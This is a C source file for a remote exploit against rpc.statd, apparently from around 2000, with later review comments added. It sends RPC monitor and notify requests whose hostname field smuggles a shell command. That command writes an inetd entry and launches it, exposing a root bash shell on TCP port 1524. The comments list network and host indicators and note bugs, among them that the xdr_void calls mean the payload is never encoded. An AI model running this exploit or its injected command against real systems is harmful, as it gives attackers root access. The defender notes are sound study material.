- /*
- *
- * Remote exploit for rpc.statd(remote) - Private, Do not distribute!
- *
- * Written by \x90
- *
- * Greetz to p0rtal, paranoid, digit, f1ex, tmoggie, luke_skyw, pyro,
- * lostie, all in sK, and all the guys on #hax
- *
- * Usage: ./stdz [hostname] [name]
- *
- */
-
-
- #include <stdio.h>
- #include <string.h>
- #include <netdb.h>
- #include <rpc/rpc.h>
- #include <sys/time.h>
- #include <sys/types.h>
- #include <sys/socket.h>
- #include <rpcsvc/sm_inter.h>
-
/*
 * Entry point.  Makes two RPC calls to the statd (SM_PROG) service on the
 * host named in argv[1]: SM_MON with a monitor request whose mon_name
 * points at a buffer holding a shell command line, then SM_NOTIFY naming
 * the same buffer.  Nothing here exploits anything by itself; the program
 * only builds these structures and hands them to the RPC library.  Whether
 * the remote side does anything with the string depends entirely on how
 * that rpc.statd handles mon_name (historical, long-patched behaviour).
 *
 * Defender notes (review):
 *  - Network indicator: an SM_MON / SM_NOTIFY request to program 100024
 *    whose mon_name is not a hostname but contains shell metacharacters
 *    (';', '>>', '&') and a path under /tmp.
 *  - Host artefacts named by the payload string below: the file /tmp/.zxc
 *    and an inetd started with `-s /tmp/.zxc`, which would expose a root
 *    shell on the ingreslock port (1524/tcp, echoed by the final printf).
 *  - Mitigation is the standard one for this class: patched statd, and no
 *    portmapper/statd exposure to untrusted networks.
 *
 * Returns: always exits with status 0, on success and on every failure
 * path alike, so the exit code carries no information.
 */
int main(int argc, char *argv[])
{
    CLIENT *cl;
    enum clnt_stat stat;
    struct sm_stat_res monres;
    struct mon monreq;
    struct sockaddr_in target;
    struct hostent *host;
    struct timeval tval;
    struct stat_chge ntz;
    char buf[1024];          /* holds the command string passed as mon_name */
    int sockz;

    /* argv[1] = target host, argv[2] = caller name placed in my_name. */
    if (argc != 3)
    {
        printf("Statd exploit by \\x90 - PRIVATE!\n\n");
        printf("Usage: %s server name\n", argv[0]);
        exit(0);             /* exit() used without <stdlib.h>: implicit declaration */
    }

    bzero(buf, sizeof(buf));
    bzero(&monreq, sizeof(monreq));

    /* Fixed literal, no user input, well under sizeof(buf): no overflow here.
     * This is the string that ends up in mon_name on the wire. */
    sprintf(buf, "; echo \"ingreslock stream tcp nowait root /bin/bash bash\" >> /tmp/.zxc ; /usr/sbin/inetd -s /tmp/.zxc &; rm -f /tmp/.zxc;");

    /* my_id describes the caller statd is supposed to notify later; the
     * program/version/procedure numbers here are arbitrary values. */
    monreq.mon_id.my_id.my_name = argv[2];
    monreq.mon_id.my_id.my_prog = (unsigned long) 100099;
    monreq.mon_id.my_id.my_vers = (unsigned long) 1;
    monreq.mon_id.my_id.my_proc = (unsigned long) 1;
    monreq.mon_id.mon_name = buf;       /* the "host to monitor" is the command string */
    monreq.priv[0] = '/';               /* opaque private data; only first byte set */

    tval.tv_sec = 9;                    /* 9 s timeout for both create and calls */
    tval.tv_usec = 0;
    ntz.mon_name = buf;                 /* same buffer reused for the notify */
    ntz.state = 1;

    /* Return value is not checked: an unresolvable name leaves host NULL
     * and the dereference a few lines down crashes the program. */
    host = gethostbyname(argv[1]);

    target.sin_family = AF_INET;
    /* Type-punned copy of the first resolved address (aliasing-unsafe, but
     * the common idiom of the era). */
    target.sin_addr.s_addr = *(u_long *)host->h_addr;
    target.sin_port = 0;                /* 0: let the RPC library ask the portmapper */

    sockz = RPC_ANYSOCK;                /* let clntudp_create open the socket */

    if ( (cl = clntudp_create(&target, SM_PROG, SM_VERS, tval, &sockz)) == NULL)
    {
        printf("Failure.\n");
        exit(0);
    }

    /* NOTE(review): xdr_void is the no-op XDR routine, so as written the
     * call body carries no encoded argument and monres is never filled in;
     * the structures built above are not what actually goes on the wire. */
    stat = clnt_call(cl, SM_MON,(xdrproc_t) xdr_void, &monreq,(xdrproc_t) xdr_void, &monres, tval);

    if (stat != RPC_SUCCESS)
    {
        printf("Failure\n");
        exit(0);
    }

    /* Same xdr_void pattern as above; result pointer is NULL. */
    stat=clnt_call(cl, SM_NOTIFY, xdr_void, &ntz,xdr_void,NULL,tval);

    if (stat != RPC_SUCCESS)
    {
        printf("Failure.\n");
        exit(0);
    }

    clnt_destroy(cl);

    /* 1524 is the ingreslock port referenced in the payload string. */
    printf("Worx?, Telnet %s 1524\n", argv[1]);
    exit(0);
}
- /* www.hack.co.za [2000]*/